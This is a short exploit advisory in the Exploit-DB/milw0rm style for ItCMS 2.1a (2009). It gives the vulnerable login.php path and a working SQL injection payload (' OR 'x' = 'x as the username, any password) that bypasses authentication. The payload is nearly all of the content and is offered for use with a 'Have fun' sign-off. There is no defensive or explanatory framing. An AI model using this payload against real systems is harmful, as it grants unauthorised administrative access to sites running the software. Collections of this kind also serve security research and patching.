ItCMS 2.1a - Authentication Bypass

EDB-ID:

7686




Platform:

PHP

Date:

2009-01-06


                     __         .__            .___             __  .__     
  ____  ____________/  |______  |__| ____    __| _/____ _____ _/  |_|  |__  
_/ ___\/ __ \_  __ \   __\__  \ |  |/    \  / __ |/ __ \\__  \\   __\  |  \ 
\  \__\  ___/|  | \/|  |  / __ \|  |   |  \/ /_/ \  ___/ / __ \|  | |   Y  \
 \___  >___  >__|   |__| (____  /__|___|  /\____ |\___  >____  /__| |___|  /
     \/    \/                 \/        \/      \/    \/     \/          \/ 
--+++~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+++--
--+++~~~~~ IT!CMS <= vers. SQL Injection Vulnerability ~~~~~+++--
--+++~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+++--
[+] Discovered by: certaindeath
[+] Exploit: simple SQL injection
[+] Path: [cms dir]/login.php
[+] Username: ' OR 'x' = 'x
[+] Password: anything
[+] Have fun ^^

# milw0rm.com [2009-01-06]